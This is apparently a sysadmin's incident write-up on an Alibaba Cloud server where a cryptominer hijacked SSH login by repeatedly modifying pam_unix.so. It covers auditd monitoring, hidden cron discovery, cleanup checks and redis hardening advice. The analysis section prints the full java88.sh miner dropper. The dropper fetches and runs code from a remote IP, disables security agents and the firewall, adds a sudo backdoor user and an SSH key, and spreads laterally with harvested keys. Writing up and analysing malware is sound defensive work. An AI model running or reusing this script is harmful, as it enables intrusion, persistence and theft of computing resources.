Contents

  • Symptoms
  • Solution
    • 1. Use audit to monitor the `pam_unix.so` file
    • 2. Find hidden cron commands
  • Mining script analysis
  • Summary

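Symptoms

One day, SSH login to the server stopped working even with the correct username and password.

Even when logging in through Alibaba Cloud's VNC console, a `login incorrect` error appeared right after the username was entered.

The login log showed the following:

We opened a support ticket and asked Alibaba Cloud operations for help. They found that the pam_unix.so file was being tampered with, but they did not fully resolve the problem.

Checking the file with stat:

Figure 1: state after reinstalling pam

Figure 2: a few minutes later, pam_unix.so had been modified

From these symptoms we understood that our SSH login had been hijacked. The fix is described below.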

Solution

1. Use audit to monitor the pam_unix.so file

For installation, see: "Monitoring which program modifies a file on Linux"

(1) Configure the monitoring rule

# vi /etc/audit/rules.d/audit.rules
-a always,exit -F path=/usr/lib64/security/pam_unix.so -F perm=warx -F key=pam_unix-filter

(2) Restart the audit service

service auditd restart

(3) Check the audit rules

# auditctl -l
-a always,exit -F path=/usr/lib64/security/pam_unix.so -F perm=warx -F key=pam_unix-filter

(4) Reinstall pam

# yum reinstall pam

(5) Wait a few minutes, then check which program modified the file

# ausearch -k pam_unix-filter

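The logs from that time were not kept; for illustration, the log shown here is a more recent one:

The log showed that the crond program was modifying the file. However, `crontab -l` did not show any job that modified it.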
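To turn the `ausearch` output from step (5) into a per-program tally, the helper below counts the SYSCALL records that carry the rule's key, grouped by `exe` and `comm`. It is an added example, not part of the original post; the function names and the sample records are constructed for illustration.

```sh
#!/bin/sh
# Tally which programs triggered the audit rule, from ausearch text on stdin.
# Live use: ausearch -k pam_unix-filter | summarize_audit pam_unix-filter
summarize_audit() {
    awk -v want="key=\"$1\"" '
        $1 == "type=SYSCALL" {
            exe = ""; comm = ""; hit = 0
            for (i = 2; i <= NF; i++) {
                if ($i == want)         hit = 1
                else if ($i ~ /^exe=/)  exe = substr($i, 5)
                else if ($i ~ /^comm=/) comm = substr($i, 6)
            }
            gsub(/"/, "", exe); gsub(/"/, "", comm)
            if (hit) count[exe " " comm]++
        }
        END { for (k in count) print count[k], k }
    ' | sort -rn
}

# Constructed sample in ausearch's default text layout (not the post's real log).
sample_audit_records() {
cat <<'EOF'
----
time->Tue Mar  8 10:30:01 2022
type=PATH msg=audit(1646735401.101:901): item=0 name="/usr/lib64/security/pam_unix.so" nametype=NORMAL
type=SYSCALL msg=audit(1646735401.101:901): arch=c000003e syscall=2 success=yes exit=3 ppid=1 pid=2211 uid=0 comm="crond" exe="/usr/sbin/crond" key="pam_unix-filter"
----
time->Tue Mar  8 11:00:01 2022
type=SYSCALL msg=audit(1646737201.202:955): arch=c000003e syscall=2 success=yes exit=3 ppid=1 pid=2950 uid=0 comm="crond" exe="/usr/sbin/crond" key="pam_unix-filter"
----
time->Tue Mar  8 11:05:40 2022
type=SYSCALL msg=audit(1646737540.303:960): arch=c000003e syscall=82 success=yes exit=0 ppid=3100 pid=3101 uid=0 comm="yum" exe="/usr/bin/python2.7" key="pam_unix-filter"
----
time->Tue Mar  8 11:06:02 2022
type=SYSCALL msg=audit(1646737562.404:961): arch=c000003e syscall=2 success=yes exit=3 ppid=3100 pid=3150 uid=0 comm="vim" exe="/usr/bin/vim" key="other-rule"
EOF
}

# Dry run on the constructed records: one "count exe comm" line per program.
sample_audit_records | summarize_audit pam_unix-filter
```

The `ppid` and `pid` fields of the matching records identify the process to trace back when the tally points at a daemon such as crond.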

2. Find hidden cron commands

(1) View the current list of scheduled tasks

#  ll /var/spool/cron/

(2) View hidden scheduled tasks

# cat -A /var/spool/cron/root

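The file contained many scheduled tasks that we did not recognise:

As the screenshot shows, some of the files on our server had been copied, and the cron jobs for the mining scripts were hidden among them.

For how crontab jobs can be hidden, see: "linux: hiding your crontab backdoor"

Remove this file (keeping a copy for study), and then delete the corresponding files one by one.

At the same time, all the scheduled tasks were filtered out, as follows:

Copy the scheduled-task scripts out for analysis.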

# mv /var/spool/cron/root /var/spool/cron/root.bk
# touch /var/spool/cron/root
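The `cat -A` check from step (2) can be run over every crontab at once. The scan below is an added example, not part of the original post: it lists each line that contains a control byte, printed in the same `^X` notation. The function names and the sample crontab are constructed, and `grep -a` and `cat -v` are assumed to be available, as they are on GNU systems.

```sh
#!/bin/sh
# List crontab lines that contain control bytes (what `cat -A` would reveal).
# Prints file:lineno:line in ^X notation; returns 0 if anything was found.
# Live use: scan_cron_files /etc/crontab /etc/cron.d/* /var/spool/cron/*
scan_cron_files() {
    status=1
    for f in "$@"; do
        [ -f "$f" ] || continue
        # Tabs are legitimate separators, so neutralise them before matching.
        hits=$(tr '\t' ' ' < "$f" | LC_ALL=C grep -an '[[:cntrl:]]' | cat -v)
        [ -n "$hits" ] || continue
        printf '%s\n' "$hits" | while IFS= read -r line; do
            printf '%s:%s\n' "$f" "$line"
        done
        status=0
    done
    return "$status"
}

# Constructed sample: line 2 carries a carriage return, so a terminal
# overwrites the start of the line with the text that follows it.
# The command in it is a harmless placeholder.
make_sample_crontab() {
    printf '0 3 * * *\t/usr/local/bin/backup.sh\n'
    printf '*/30 * * * * /bin/true # constructed\rno crontab for root\n'
}

# Dry run on the constructed file.
demo_dir=$(mktemp -d)
make_sample_crontab > "$demo_dir/root"
scan_cron_files "$demo_dir/root" || true
rm -rf "$demo_dir"
```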

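Mining script analysis

We analysed one of the scripts, java88.sh. For the analysis workflow, see: "Reconstructing an intrusion by the infectious, self-hiding Linux watchdogs mining malware"
The resulting cleanup steps are summarised as follows:

  1. Disable the scheduled tasks
  2. Delete the SSH login information
  3. Delete the downloaded applications and other scripts
  4. Delete all the directories that were created
  5. Delete the renamed commands; md5sum can be used to check them. For example, the cd1 command has the same md5 value as wget.

Note: the steps above need to be carried out for every script.

The script content is as follows: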

#!/bin/bash -e
VERSION=2.22
if [ -f "/etc/.system/java/java8_8.log" ]
then
  echo "process possible running"
  current=$(date +%s)
  last_modified=$(stat -c "%Y" /etc/.system/java/java8_8.log)
  if [ $(($current-$last_modified)) -gt 600 ]; then
    echo "no rr process running";
  else
    echo "rr process running"
    exit 1
  fi
else
  echo "rr process not running"
fi
curl -fsSL http://65.108.48.150/java8-py/make-rr.sh | bash
cd1 -fsSL http://65.108.48.150/java8-py/make-rr.sh | bash
cc1 -fsSL http://65.108.48.150/java8-py/make-rr.sh | bash
export RRHOME=/etc/.system/java
mkdir $RRHOME -p
rm -rf /var/log/syslog
rm -rf /etc/.system/rtm
chattr -iua /tmp/
chattr -iua /var/tmp/
ufw disable
iptables -F
sudo sysctl kernel.nmi_watchdog=0
sysctl kernel.nmi_watchdog=0
echo '0' >/proc/sys/kernel/nmi_watchdog
echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
chattr -iae /root/.ssh/
chattr -iae /root/.ssh/authorized_keys
rm -rf /tmp/addres*
rm -rf /tmp/walle*
rm -rf /tmp/keys
if ps aux | grep -i '[a]liyun'; then
  curl http://update.aegis.aliyun.com/download/uninstall.sh | bash
  curl http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
  pkill aliyun-service
  rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
  rm -rf /usr/local/aegis*
  systemctl stop aliyun.service
  systemctl disable aliyun.service
  service bcm-agent stop
  yum remove bcm-agent -y
  apt-get remove bcm-agent -y
elif ps aux | grep -i '[y]unjing'; then
  /usr/local/qcloud/stargate/admin/uninstall.sh
  /usr/local/qcloud/YunJing/uninst.sh
  /usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
if [ -f /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh ]; then
  /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop && /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove && rm -rf /usr/local/cloudmonitor
else
  export ARCH=amd64
  if [ -f /usr/local/cloudmonitor/CmsGoAgent.linux-${ARCH} ]; then
    /usr/local/cloudmonitor/CmsGoAgent.linux-${ARCH} stop && /usr/local/cloudmonitor/CmsGoAgent.linux-${ARCH} uninstall && rm -rf /usr/local/cloudmonitor
  else
    echo "ali cloud monitor not running"
  fi
fi
setenforce 0
echo SELINUX=disabled >/etc/selinux/config
service apparmor stop
systemctl disable apparmor
service aliyun.service stop
systemctl disable aliyun.service
ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %
rm -rf /usr/local/aegis
echo "RR mining setup script v$VERSION."
echo
if [ "$(id -u)" == "0" ]; then
  echo "WARNING: Generally it is not adviced to run this script under root"
fi

# command line arguments
WALLET=RGj5X7QRq53FRUjCC1pGE722LBYqbiEQm6
EMAIL=$1 # this one is optional

# active 1GB pages
sysctl -w vm.nr_hugepages=$(nproc)
for i in $(find /sys/devices/system/node/node* -maxdepth 0 -type d);
do
  echo 3 > "$i/hugepages/hugepages-1048576kB/nr_hugepages";
done
echo "1GB pages successfully enabled"

# checking prerequisites
if [ -z $WALLET ]; then
  echo "Script usage:"
  echo "> setup_rr_miner.sh <wallet address> [<your email address>]"
  echo "ERROR: Please specify your wallet address"
  exit 1
fi
WALLET_BASE=`echo $WALLET | cut -f1 -d"."`
if [ ${#WALLET_BASE} != 95 -a ${#WALLET_BASE} != 34 ]; then
  echo "ERROR: Wrong wallet base address length (should be 95 or 34): ${#WALLET_BASE}"
  exit 1
fi
if [ -z $RRHOME ]; then
  echo "ERROR: Please define HOME environment variable to your home directory"
  exit 1
fi
if [ ! -d $RRHOME ]; then
  echo "ERROR: Please make sure HOME directory $RRHOME exists or set it yourself using this command:"
  echo '  export RRHOME=<dir>'
  exit 1
fi

#check curl, wget
if ! command -v curl &> /dev/null
then
  echo "curl could not be found, will install..."
  apt-get install curl -y
  yum install curl -y
fi
if ! command -v wget &> /dev/null
then
  echo "wget could not be found, will install..."
  apt-get install wget -y
  yum install wget -y
fi
if ! type lscpu >/dev/null; then
  echo "WARNING: This script requires \"lscpu\" utility to work correctly"
fi
if ! sudo -n true 2>/dev/null; then
  echo "Since I can't do passwordless sudo, mining in background will started from your $RRHOME/.profile file first time you login this host after reboot."
else
  echo "Mining in background will be performed using moneroocean_miner systemd service."
fi

# start doing stuff: preparing miner
echo "[*] Removing previous rr miner (if any)"
if sudo -n true 2>/dev/null; then
  sudo systemctl stop java88.service
fi
killall -9 xmrig
echo "[*] Downloading rr advanced version of java8_8 to /tmp/"
curl -L --progress-bar "http://65.108.48.150/f220115rr/s/java8_8" -o $RRHOME/java8_8
curl -L --progress-bar "http://65.108.48.150/f220115rr/s/java8_8.pid" -o $RRHOME/java8_8.pid
cc1 -L --progress-bar "http://65.108.48.150/f220115rr/s/java8_8" -o $RRHOME/java8_8
cc1 -L --progress-bar "http://65.108.48.150/f220115rr/s/java8_8.pid" -o $RRHOME/java8_8.pid
cd1 -L --progress-bar "http://65.108.48.150/f220115rr/s/java8_8" -o $RRHOME/java8_8
cd1 -L --progress-bar "http://65.108.48.150/f220115rr/s/java8_8.pid" -o $RRHOME/java8_8.pid
chmod +x $RRHOME/java8_8
chmod +x $RRHOME/java8_8.pid
echo "[*] Miner $RRHOME/java8_8 is OK"
PASS=`hostname | cut -f1 -d"." | sed -r 's/[^a-zA-Z0-9\-]+/_/g'`
sed -i 's/"1gb-pages": *false,/"1gb-pages": true,/' $RRHOME/java8_8.pid
sed -i 's/"algo": *null,/"algo": "gr",/' $RRHOME/java8_8.pid
sed -i 's/"tls": *false,/"tls": true,/' $RRHOME/java8_8.pid
sed -i 's/"keepalive": *false,/"keepalive": true,/' $RRHOME/java8_8.pid
sed -i 's/"url": *"[^"]*",/"url": "eu-rtm.pool-server.com:5555",/' $RRHOME/java8_8.pid
sed -i 's/"user": *"[^"]*",/"user": "'$WALLET'.'$PASS'",/' $RRHOME/java8_8.pid
sed -i 's/"pass": *"[^"]*",/"pass": "x",/' $RRHOME/java8_8.pid
sed -i 's/"max-cpu-usage": *[^,]*,/"max-cpu-usage": 100,/' $RRHOME/java8_8.pid
sed -i 's#"log-file": *null,#"log-file": "'$RRHOME/java8_8.log'",#' $RRHOME/java8_8.pid
sed -i 's/"syslog": *[^,]*,/"syslog": true,/' $RRHOME/java8_8.pid
sed -i 's/"max-threads-hint": *[^,]*,/"max-threads-hint": 75,/' $RRHOME/java8_8.pid
sed -i 's/"max-threads-hint": *[^,]*,/"max-threads-hint": 75,/' $RRHOME/java8_8_background.pid
cp $RRHOME/java8_8.pid $RRHOME/java8_8_background.pid
sed -i 's/"background": *false,/"background": true,/' $RRHOME/java8_8_background.pid

# preparing script
echo "[*] Creating $RRHOME/miner.sh script"
cat >$RRHOME/miner.sh <<EOL
#!/bin/bash
if ! pidof java8_8 >/dev/null; then
nice $RRHOME/java8_8 \$*
else
echo "RAPTOREUM miner is already running in the background. Refusing to run another one."
echo "Run \"killall java8_8\" or \"sudo killall java8_8\" if you want to remove background miner first."
fi
EOL
chmod +x $RRHOME/miner.sh

# preparing script background work and work under reboot
if ! sudo -n true 2>/dev/null; then
  if ! grep miner.sh $RRHOME/.profile >/dev/null; then
    echo "[*] Adding $RRHOME/miner.sh script to $RRHOME/.profile"
    echo "$RRHOME/miner.sh --config=$RRHOME/java8_8_background.pid >/dev/null 2>&1" >>$RRHOME/.profile
  else
    echo "Looks like $RRHOME/miner.sh script is already in the $RRHOME/.profile"
  fi
  echo "[*] Running miner in the background (see logs in $RRHOME/java8_8.log file)"
  /bin/bash $RRHOME/miner.sh --config=$RRHOME/java8_8_background.pid >/dev/null 2>&1
else
  if [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') -gt 3500000 ]]; then
    echo "[*] Enabling huge pages"
    echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.conf
    sudo sysctl -w vm.nr_hugepages=$((1168+$(nproc)))
  fi
  if ! type systemctl >/dev/null; then
    echo "[*] Running miner in the background (see logs in $RRHOME/java8_8.log file)"
    /bin/bash $RRHOME/miner.sh --config=$RRHOME/java8_8_background.pid >/dev/null 2>&1
    echo "ERROR: This script requires \"systemctl\" systemd utility to work correctly."
    echo "Please move to a more modern Linux distribution or setup miner activation after reboot yourself if possible."
  else
    echo "[*] Creating rr_miner systemd service"
    cat >/tmp/java88.service <<EOL
[Unit]
Description=RTM miner service

[Service]
ExecStart=$RRHOME/java8_8 --config=$RRHOME/java8_8.pid
Restart=always
Nice=10
CPUWeight=1

[Install]
WantedBy=multi-user.target
EOL
    sudo mv /tmp/java88.service /etc/systemd/system/java88.service
    echo "[*] Starting rr_miner systemd service"
    sudo killall xmrig 2>/dev/null
    sudo systemctl daemon-reload
    sudo systemctl enable java88.service
    sudo systemctl start java88.service
    echo "To see miner service logs run \"sudo journalctl -u rr_miner -f\" command"
  fi
fi
echo ""
RSAKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDWh4GJVPXi1DjSOxs4ytVtVT/XogOlBzAoWn5qE4yyO6EXRz1FhC+EVY9hmUcjMUN1Rp7dYZMLO1vsWhhpqmX9H0YWV2JfKixcXKE2eNrKxl45IRrhIRqNYzr/QnsmLdXZl5OLqoo587jwMCZeWB10NuOiUv5PKVCKUNtT2MQxKv/n5HleqY1Nn9uzFEiIkD39dmqm/4gKPbAcz3uXi31yVVSvUdmqoUoj8B/EdQn182z/Ix+WUJWAuYD2WTrhhYbcDvi+MSOm9ld7MgeOpxzLSEJjEja4+2EHD7dkoNLMD9/UH4FW3yzt3kTUBdaeGJN0mndoex3IggihB5dMjuTnKp25iv6xzYXRCaupxnsRN2rYQlbda8+jZOTxF+nwRGeX9QeSthlQzzZyxEHT7USxQCBpvlyyTZJ9ugX/j11XkKdAGzmKZGo7F0Qxp173eL0SH+6roqrQcXL85r5OPjUd9Xt9fHz2zskN/urYcp6Oi+9kjQgWY0NcjMu/H5YaPP8= wolf@wolfs-MacBook-Pro.local"
grep -q hilde /etc/passwd || chattr -ia /etc/passwd;
grep -q hilde /etc/passwd || echo 'hilde:x:1000:1000::/home/hilde:/bin/bash' >> /etc/passwd; chattr +ia /etc/passwd
grep -q hilde /etc/shadow || chattr -ia /etc/shadow;
grep -q hilde /etc/shadow || echo 'hilde:$6$7n/iy4R6znS2iq0J$QjcECLSqMMiUUeHR*&5kloie4iJmkHLzAwgoNRhCC87HI3df95nZH5569TKwJEN2I/lNanPe0vhsdgfILPXedlWlZn7lz0:18461:0:99999:7:::' >> /etc/shadow; chattr +ia /etc/shadow
grep -q hilde /etc/sudoers || chattr -ia /etc/sudoers;
grep -q hilde /etc/sudoers || echo 'hilde  ALL=(ALL:ALL) ALL' >> /etc/sudoers; chattr +i /etc/sudoers
mkdir /run/network/.ssh/ -p
touch /run/network/.ssh/authorized_keys
touch /run/network/.ssh/authorized_keys2
chmod 600 /run/network/.ssh/authorized_keys
chmod 600 /run/network/.ssh/authorized_keys2
grep -q wolf@wolfs-MacBook-Pro.local /run/network/.ssh/authorized_keys || chattr -ia /run/network/.ssh/authorized_keys;
grep -q wolf@wolfs-MacBook-Pro.local /run/network/.ssh/authorized_keys || echo $RSAKEY > /run/network/.ssh/authorized_keys; chattr +ia /run/network/.ssh/authorized_keys;
grep -q wolf@wolfs-MacBook-Pro.local /run/network/.ssh/authorized_keys2 || chattr -ia /run/network/.ssh/authorized_keys2;
grep -q wolf@wolfs-MacBook-Pro.local /run/network/.ssh/authorized_keys2 || echo $RSAKEY > /run/network/.ssh/authorized_keys2; chattr +ia /run/network/.ssh/authorized_keys2;
mkdir /root/.ssh/ -p
touch /root/.ssh/authorized_keys
touch /root/.ssh/authorized_keys2
chmod 600 /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys2
grep -q wolf@wolfs-MacBook-Pro.local /root/.ssh/authorized_keys || chattr -ia /root/.ssh/authorized_keys;
grep -q wolf@wolfs-MacBook-Pro.local /root/.ssh/authorized_keys || echo $RSAKEY >> /root/.ssh/authorized_keys; chattr +ia /root/.ssh/authorized_keys
grep -q wolf@wolfs-MacBook-Pro.local /root/.ssh/authorized_keys2 || chattr -ia /root/.ssh/authorized_keys2;
grep -q wolf@wolfs-MacBook-Pro.local /root/.ssh/authorized_keys2 || echo $RSAKEY > /root/.ssh/authorized_keys2; chattr +ia /root/.ssh/authorized_keys2
echo "Port 11222" >> /etc/ssh/sshd_config
echo "Protocol 2" >> /etc/ssh/sshd_config
echo "ListenAddress 0.0.0.0" >> /etc/ssh/sshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile  .ssh/authorized_keys" >> /etc/ssh/sshd_config
chattr -R -ia /var/spool/cron
chattr -ia /etc/crontab
chattr -R -ia /etc/cron.d
chattr -R -ia /var/spool/cron/crontabs
crontab -r
rm -rf /var/spool/cron/*
rm -rf /etc/cron.d/*
rm -rf /var/spool/cron/crontabs
rm -rf /etc/crontab
crontab -l 2>/dev/null
echo "*/30 * * * * root curl -fsSL http://65.108.48.150/f220305r/java8.sh | bash " >> /etc/crontab
echo "*/30 * * * * root cd1 -fsSL http://65.108.48.150/f220305r/java8.sh | bash " >> /etc/crontab
echo "*/30 * * * * root cc1 -fsSL http://65.108.48.150/f220305r/java8.sh | bash " >> /etc/crontab
echo crontab created
touch -d 20180515 /etc/crontab
chattr -R +ia /var/spool/cron
chattr +ia /etc/crontab
chattr -R +ia /var/spool/cron/crontabs
chattr -R +ia /etc/cron.d
touch -d 20151212 /etc/.system
touch -d 20181212 /etc/crontab
localgo() {
  KEYS=$(find ~/ /root /home -maxdepth 2 -name 'id_rsa*' | grep -vw pub)
  KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
  KEYS3=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
  HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
  HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
  HOSTS3=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
  USERZ=$(
    echo "root"
    find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -v "\.ssh"
  )
  userlist=$(echo $USERZ | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  keylist=$(echo "$KEYS $KEYS2 $KEYS3" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  for user in $userlist; do
    for host in $hostlist; do
      for key in $keylist; do
        chmod +r $key; chmod 400 $key
        ssh -o StrictHostKeyChecking=no -o BatchMode=yes -o ConnectTimeout=5 -i $key $user@$host "(curl -fsSL  http://65.108.48.150/f220305r/java8.sh||cd1 -fsSL  http://65.108.48.150/f220305r/java8.sh||cc1 -fsSL  http://65.108.48.150/f220305r/java8.sh) | bash"
      done
    done
  done
}
if [ ! -f "/var/tmp/.alsp" ];
then
  localgo
  echo 'lockfile' > /var/tmp/.alsp
  chattr +i /var/tmp/.alsp
else
  echo "replay .. i know this server ..."
  exit
fi
mv /usr/bin/curl /usr/bin/cc1
mv /usr/bin/url /usr/bin/uu1
mv /usr/bin/wget /usr/bin/ww1
mv /usr/bin/get /usr/bin/wd1
mv /usr/bin/cd1 /usr/bin/cc1
echo "[*] Setup compXlete"
curl ldfx58.ceye.io
cd1 ldfx58.ceye.io
cc1 ldfx58.ceye.io
history -c
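The cleanup steps and the listing above leave a concrete set of artefacts to look for on a host. The check below is an added example, not part of the original post: it looks for the paths, account name, key comment, port and address that appear in the listing. The function names and the sample tree are constructed, and the root-prefix argument is an assumption that lets it run against a mounted disk image or a test directory.

```sh
#!/bin/sh
# Report leftovers of the java88.sh listing under a root prefix ("" = live host).
# Prints one FOUND line per artefact; returns 0 only when nothing was found.
check_leftovers() {
    root=$1
    found=0
    report() { printf 'FOUND %s\n' "$1"; found=$((found + 1)); }
    match() { [ -f "$root$1" ] && grep -qE -- "$2" "$root$1" 2>/dev/null; }

    # Files and directories the script creates, and the renamed download tools.
    for p in /etc/.system /var/tmp/.alsp /etc/systemd/system/java88.service \
             /usr/bin/cc1 /usr/bin/cd1 /usr/bin/ww1 /usr/bin/wd1 /usr/bin/uu1; do
        if [ -e "$root$p" ]; then report "path $p"; fi
    done
    # Account appended to passwd, shadow and sudoers.
    for f in /etc/passwd /etc/shadow /etc/sudoers; do
        if match "$f" '^hilde[:[:space:]]'; then report "account hilde in $f"; fi
    done
    # Public key identified by its comment field.
    for f in /root/.ssh/authorized_keys /root/.ssh/authorized_keys2 \
             /run/network/.ssh/authorized_keys /run/network/.ssh/authorized_keys2; do
        if match "$f" 'wolf@wolfs-MacBook-Pro\.local'; then report "key in $f"; fi
    done
    if match /etc/ssh/sshd_config '^Port 11222'; then report "sshd port 11222"; fi
    if match /etc/crontab '65\.108\.48\.150'; then report "cron job in /etc/crontab"; fi
    if match /etc/sysctl.conf '^kernel\.nmi_watchdog=0'; then report "nmi_watchdog off"; fi
    printf '%s finding(s)\n' "$found"
    [ "$found" -eq 0 ]
}

# Constructed sample tree holding a few of the artefacts, for a dry run.
make_sample_root() {
    r=$(mktemp -d)
    mkdir -p "$r/etc/.system" "$r/etc/ssh" "$r/root/.ssh" "$r/usr/bin"
    printf 'hilde:x:1000:1000::/home/hilde:/bin/bash\n' > "$r/etc/passwd"
    printf 'ssh-rsa AAAA-constructed wolf@wolfs-MacBook-Pro.local\n' \
        > "$r/root/.ssh/authorized_keys"
    printf 'Port 11222\n' > "$r/etc/ssh/sshd_config"
    : > "$r/usr/bin/cc1"
    printf '%s\n' "$r"
}

sample=$(make_sample_root)
check_leftovers "$sample" || true
rm -rf "$sample"
```

Files the script touched may still carry the `i` and `a` attributes it set with `chattr +ia`, so clear them with `chattr -ia` before editing or deleting them.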

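Summary

From the scheduled tasks we saw the following information, and we suspect that the mining program got in this time by logging in through redis's default port and account/password.

So, from now on, when installing any service that can be accessed remotely:
(1) the default port and the account/password must be changed before remote access is opened;
(2) permissions should be set as tightly as possible;
(3) remember to back up important server data.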
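Point (1) can be checked mechanically for the redis case suspected above. The following audit of a redis.conf is an added example, not part of the original post; it relies only on the standard `port`, `bind`, `requirepass` and `protected-mode` directives, and the function names and sample files are constructed.

```sh
#!/bin/sh
# Flag redis.conf settings that leave the service reachable with defaults.
# Prints one WEAK line per issue; returns 0 only when no issue was found.
audit_redis_conf() {
    conf=$1
    issues=0
    flag() { printf 'WEAK %s\n' "$1"; issues=$((issues + 1)); }
    # Value of a directive; the last occurrence wins, comment lines are skipped.
    directive() {
        awk -v d="$1" 'tolower($1) == d { $1 = ""; sub(/^ +/, ""); v = $0 }
                       END { print v }' "$conf"
    }
    port=$(directive port)
    bind=$(directive bind)
    pass=$(directive requirepass)
    pm=$(directive protected-mode)
    [ -n "$port" ] || port=6379              # Redis default when unset
    if [ "$port" = 6379 ]; then flag "default port 6379"; fi
    if [ -z "$pass" ]; then flag "no requirepass set"; fi
    case " $bind " in
        "  "|*" 0.0.0.0 "*|*" * "*)
            flag "listening on all interfaces (bind: ${bind:-unset})" ;;
    esac
    if [ "$pm" = no ]; then flag "protected-mode disabled"; fi
    [ "$issues" -eq 0 ]
}

# Constructed sample configurations: one weak, one corrected.
write_sample_confs() {
    printf '# constructed\nport 6379\nbind 0.0.0.0\nprotected-mode no\n' \
        > "$1/weak.conf"
    printf 'port 16379\nbind 127.0.0.1\nrequirepass "long-random-secret"\nprotected-mode yes\n' \
        > "$1/ok.conf"
}

conf_dir=$(mktemp -d)
write_sample_confs "$conf_dir"
audit_redis_conf "$conf_dir/weak.conf" || true
audit_redis_conf "$conf_dir/ok.conf" && echo "ok.conf: no weak settings"
rm -rf "$conf_dir"
```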

The commands used throughout the process were:

  • stat
  • audit
  • chattr
  • ……
